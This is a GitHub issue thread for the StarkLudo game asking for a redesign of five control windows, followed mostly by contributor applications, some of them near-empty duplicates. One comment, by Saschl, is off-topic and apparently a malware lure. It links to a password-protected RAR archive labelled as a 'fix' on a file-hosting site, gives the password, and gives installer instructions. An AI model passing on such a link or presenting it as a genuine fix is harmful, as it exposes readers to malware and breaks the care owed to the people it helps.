### ISSUE TITLE
Redesign game control windows

### ISSUE THREAD

**Issue by ibsule** [sivicstudio/starkludo#29]
Currently, there are 5 mini windows where the player can use to perform various actions and view certain info about. The contents of the mini windows are all empty at the moment. Redesign the 5 windows and their corresponding contents based on the game specifications. 

Note: This issue requires that the project leads gives more context via call.

If you have any more questions or need more clarity on this issue, endeavour to join the StarkLudo contributors channel (https://t.me/+hnjQooODZOA2M2Rk) on Telegram and the project leads will be there to help.

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Osatuyi** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/starkludo).

### My background and how it can be leveraged
I'm a uiux designer. I have a 2years experience designing both web 2 and web 3 products and I pride myself in working both fast and excellently well. I can deliver a clean design in time.
Here's my portfolio: https://www.figma.com/proto/HcFnqYWAab3sA4ws0oL8HL?node-id=16-2290&t=omVPZonzvmTaoXMm-6

### How I plan on tackling this issue
I will make proper research on the different ways the game windows can be represented and draft unique wireframes that fit this particular product. If there is an existing design system, I will work with it. If there isn't I will create one. 
I will submit a clean ui design and effect any adjustments I'm adviced to make to make it better, before prototyping.
I'll like to work on this project.

**Comment by NueloSE** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/starkludo).

### My background and how it can be leveraged
can i

**Comment by NueloSE** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/starkludo).

### My background and how it can be leveraged
can i

**Comment by petersdt** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/starkludo).

### My background and how it can be leveraged
can i

**Comment by Kaminar-i** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/starkludo).

### My background and how it can be leveraged
i'm a product designer
